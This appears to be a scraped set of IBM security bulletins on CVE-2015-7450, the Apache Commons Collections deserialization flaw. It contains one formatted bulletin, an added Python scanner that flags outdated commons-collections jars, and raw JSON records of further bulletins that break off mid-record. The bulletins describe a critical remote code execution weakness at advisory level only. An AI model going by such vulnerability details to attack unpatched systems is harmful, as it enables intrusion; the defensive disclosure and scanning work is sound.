## Summary
A vulnerability in the Java object deserialization handling of Apache Commons Collections has been addressed in IBM Tivoli Composite Application Manager Agent for WebSphere Applications.
## Vulnerability Details
**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)
**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data using the Java InvokerTransformer class. By sending specially crafted serialized data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.
CVSS Base Score: 9.8
CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
## Affected Products and Versions
IBM Tivoli Composite Application Manager Agent for WebSphere Applications 7.1.0.3.x and 7.2.0.0.x
## Workarounds and Mitigations
The affected Apache commons-collections-3.2.jar ships in the IBM Tivoli Composite Application Manager Agent for WebSphere Applications image. Instructions for replacing commons-collections-3.2.jar with commons-collections-3.2.2.jar are available at <http://www.ibm.com/support/docview.wss?uid=swg21972189>.
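Because the mitigation is a jar swap, a defender will want to confirm which commons-collections build is actually on disk rather than trusting the file name. The following Python script is an added example, not IBM's or Apache's code: it walks an install tree, reads each commons-collections jar's version from its manifest (falling back to the file name) and flags anything below the fixed 3.2.2 release named in this bulletin. The manifest keys it reads, the 4.1 fixed release used for the 4.x line and the sample jars it builds are assumptions and constructed fixtures, not taken from the bulletin.

```python
"""Check which Apache Commons Collections jar a deployment really contains.

Added example (not from the bulletin). It walks an install directory, opens
every jar whose name starts with 'commons-collections', reads the version
from META-INF/MANIFEST.MF (Implementation-Version, then Bundle-Version),
falls back to the file name, and reports jars older than the fixed release.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# 3.x line: InvokerTransformer deserialization hardened in 3.2.2 (this bulletin).
# 4.x line: the same fix shipped in 4.1 (known fact, not stated in this bulletin).
FIXED = {3: (3, 2, 2), 4: (4, 1)}

# File-name fallback, e.g. commons-collections-3.2.1.jar or commons-collections4-4.0.jar
VERSION_RE = re.compile(r"commons-collections4?-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '3.2.2' into (3, 2, 2); ignores non-numeric suffixes such as '-SNAPSHOT'."""
    m = re.match(r"(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def manifest_version(jar_path: str) -> Optional[str]:
    """Read Implementation-Version or Bundle-Version from the jar manifest, if present."""
    with zipfile.ZipFile(jar_path) as zf:
        try:
            raw = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            return None  # no manifest at all
    # Manifest continuation lines start with a single space; join them first.
    text = raw.replace("\r\n", "\n").replace("\n ", "")
    for key in ("Implementation-Version", "Bundle-Version"):
        m = re.search(rf"^{key}:\s*(\S+)", text, re.MULTILINE)
        if m:
            return m.group(1)
    return None


def is_vulnerable(version: Tuple[int, ...]) -> bool:
    """True when the version is below the fixed release of its major line."""
    fixed = FIXED.get(version[0])
    if fixed is None:
        return False  # unknown line; treat separately if it matters to you
    return version < fixed  # tuple comparison: (3, 2) < (3, 2, 2)


def scan(root: str) -> List[dict]:
    """Return one finding per commons-collections jar found under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not (name.startswith("commons-collections") and name.endswith(".jar")):
                continue
            path = os.path.join(dirpath, name)
            source, ver_text = "manifest", manifest_version(path)
            if ver_text is None:  # manifest missing or without a version: trust the name
                m = VERSION_RE.search(name)
                source, ver_text = "filename", (m.group(1) if m else None)
            if ver_text is None:
                findings.append({"path": path, "version": None, "vulnerable": None, "source": None})
                continue
            version = parse_version(ver_text)
            findings.append({"path": path, "version": ".".join(map(str, version)),
                             "vulnerable": is_vulnerable(version), "source": source})
    return findings


def make_sample_jar(path: str, impl_version: Optional[str]) -> None:
    """Constructed fixture: a jar holding only a manifest (no real classes)."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        if impl_version is None:
            zf.writestr("README", "fixture without a manifest")
        else:
            zf.writestr("META-INF/MANIFEST.MF",
                        f"Manifest-Version: 1.0\r\nImplementation-Version: {impl_version}\r\n")


def demo() -> Dict[str, dict]:
    """Build a constructed install tree and return findings keyed by relative path."""
    root = tempfile.mkdtemp(prefix="cc-scan-")
    make_sample_jar(os.path.join(root, "lib", "commons-collections-3.2.jar"), "3.2")      # vulnerable
    make_sample_jar(os.path.join(root, "lib", "commons-collections-3.2.2.jar"), "3.2.2")  # fixed
    make_sample_jar(os.path.join(root, "lib", "old", "commons-collections-3.2.1.jar"), None)  # name fallback
    # Renamed jar: file name claims 3.2.2 but the manifest says 3.2, so it is still flagged.
    make_sample_jar(os.path.join(root, "lib", "renamed", "commons-collections-3.2.2.jar"), "3.2")
    return {os.path.relpath(f["path"], root).replace(os.sep, "/"): f for f in scan(root)}


if __name__ == "__main__":
    for rel, finding in sorted(demo().items()):
        print(f"{rel}: version={finding['version']} ({finding['source']}) vulnerable={finding['vulnerable']}")
```

Point `scan()` at the agent install directory to audit a real image; a jar whose manifest and file name disagree is worth a closer look.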
(CVE 2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:56:56", "id": "D807F98F285E9AA24C6982ECD7ECE986CC9DAEE3771B85EB11104E7DB3A38BAE", "href": "https://www.ibm.com/support/pages/node/273167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:44", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n\n[IBM Social Media Analytics 1.3.0 IF17](<http://www-01.ibm.com/support/docview.wss?uid=swg24041836>)\n\nFor users of IBM Social Media Analytics 1.2 IBM recommends upgrading to IBM Social Media Analytics 1.3.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone known. Apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:44:20", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Social Media Analytics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:44:20", "id": "4429AE393D14D9DD1BA1A49D42CB67BB5D731909307AF189B937C047DFFB1943", "href": "https://www.ibm.com/support/pages/node/544297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:46", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Algo Credit Administrator\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Algo Credit Administrator 2.2.0\n\n## Remediation/Fixes\n\nA fix has been created for version 2.2.0 of the named product. Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. 
\n \n\n\nPatch Number| Download URL \n---|--- \nAlgo Credit Administrator 2.2.0-116| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=2.2.0.0-Algo-ACA-gf0116:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=2.2.0.0-Algo-ACA-gf0116:0&includeSupersedes=0&source=fc&login=true>) \n \nFor versions prior to 2.2.0 IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:41:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Algo Credit Administrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:41:02", "id": "5E2AFDF7AB3E087F15E11D8D08AEEF34592E638BA469F3697192CBD365B9C998", "href": "https://www.ibm.com/support/pages/node/272173", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:29", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Forms Server.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See[ https://exchange.xforce.ibmcloud.com/vulnerabilities/107918](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>)[](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Forms Server 4.0.* \nIBM Forms Server 8.0.* \nIBM Forms Server 8.1 \nIBM Forms Server 8.2\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nIBM Forms Server| 4.0.0.*| LO87133 | \n\nDownload and install [](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.2.0-FormsServer-WFS-IF0001&includeRequisites=1>)[4.0.0.2-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=4.0.0.2-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.0.0.*| LO87133| \n\nDownload and install 
[8.0.0-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.0.0-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.0.1.*| LO87133 \nIBM Forms Server| 8.1.*| LO87133| \n\nDownload and install [8.1.0-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.1.0-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.2.*| LO87133| \n\nDownload and install [8.2.0-FormsServer-WFS-IF0001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.2.0-FormsServer-WFS-IF0001&includeRequisites=1>) \n \n \n**Note:** Before installing this update, you must first install the [WebSphere Application Server fix for APAR PI50993](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/WebSphere+Application+Server&release=All&function=aparId&apars=PI50993>). Installing this update without the fix for WAS will cause IBM Forms Server to fail. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:52:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons Collections affects IBM Forms Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T19:52:47", "id": "E9094C448DDFA53F1801F49370E9B1301873155775CFD8E4A6A53500E27FBB43", "href": "https://www.ibm.com/support/pages/node/272617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:26", "description": "## Summary\n\nThe Knowledge Center Component used in Version 9 of the WebSphere Application Server needs an updated Apache Commons Collections library. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n** DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. 
\nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affect the following versions and releases of WebSphere Application Server and bundling products.\n\n * 9.0\n \n\n\n## Remediation/Fixes\n\nTo patch an existing service instance, refer to the IBM WebSphere Application Server bulletin listed below \n\n * [Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \\(CVE-2015-7450\\)\" )\n\nPlease see [ Updating your environment](<https://cloud.ibm.com/docs/services/ApplicationServeronCloud?topic=wasaas-updating-your-environment>) in the KnowlegeCenter for information on applying service. \n\nAlternatively, delete the vulnerable service instance and create a new instance.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable in IBM Cloud (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "E0D7548645A05D9144D632068CCC3B58C8A5E23E2D109EE95E87CEFA7A738D34", "href": "https://www.ibm.com/support/pages/node/1128543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:50:45", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM System Networking Switch Center.\n\n## Vulnerability Details\n\n## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM System Networking Switch Center.\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>)\n\n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <http://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll versions of IBM System Networking Switch Center prior to 7.3.2.0.\n\n## Remediation/Fixes:\n\nIBM System Networking Switch Center 7.3.2.0.\n\nThe install package can be found on IBM's Passport Advantage website:\n\n<http://www-01.ibm.com/software/passportadvantage/>\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations:\n\nNone.\n\n## References:\n\n * [Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide.html>)\n * [On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/psirt/>) \n\n\n**Acknowledgement**\n\nNone.\n\n**Change History** \n22 February 2016: Original version published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-31T02:25:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM System Networking Switch Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-31T02:25:02", "id": "092255B27E9CC9D8C8B4052573A37868D7EA0A5694D3432A777F3FB2BA34195C", "href": "https://www.ibm.com/support/pages/node/868452", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:08", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (__CVE-2015-7450__)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * ClearQuest Web 8.0 and above. \n\n## Remediation/Fixes\n\nFollow instructions for updating your version of WebSphere Application Server to a version that includes the fixes. \n \nClearQuest uses an installation of WAS separately installed and maintained from the ClearQuest installation. Determine the version of WAS that your deployment is using and follow the instructions at [](<http://www.ibm.com/support/docview.wss?uid=swg21883573>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg21964428>)[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) to update your version of WebSphere Application Server. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-29T18:04:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearQuest (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-09-29T18:04:03", "id": "19926537DC891C5AD7A729E9A8684B4D6D6593A474667DC8BF2B3DA57D44FCF9", "href": "https://www.ibm.com/support/pages/node/272077", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Tivoli Network Manager Transmission Edition.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nTivoli Network Manager Transmission Edition 5.6\n\n## Remediation/Fixes\n\nThe affected file is the $NCHOME/precisiontn/platform/java/lib/3rdparty/commons-collections.jar. \n\n[netcool@itnmte 3rdparty]$ pwd\n\n/opt/netcool/precisiontn/platform/java/lib/3rdparty\n\n[netcool@itnmte 3rdparty]$ cksum commons-collections.jar\n\n1639223439 518641 commons-collections.jar\n\nIt should be noted that the Tivoli Network Manager Transmission Edition also installs other copies of the Apache Commons Collections library, but these files are not affected by this vulnerability.\n\nThe following instructions explain how to replace the affected commons-collections.jar:\n\n**Instructions**\n\n1\\. Download the commons-collections.jar below:\n\ncommons-collections.jar\n\n2\\. Stop the nmtn_server process.\n\n3\\. Delete or move $NCHOME/precisiontn/platform/java/lib/3rdparty/commons-collections.jar to a different directory.\n\n4\\. Copy the download commons-collections.jar to $NCHOME/precisiontn/platform/java/lib/3rdparty/\n\n5\\. 
Restart the nmtn_server process.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:42", "id": "E432DAD10EFE3753090EF63CF4FCD4A0EC759F3B4E8CBBF27B3179085A515230", "href": "https://www.ibm.com/support/pages/node/273133", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli . 
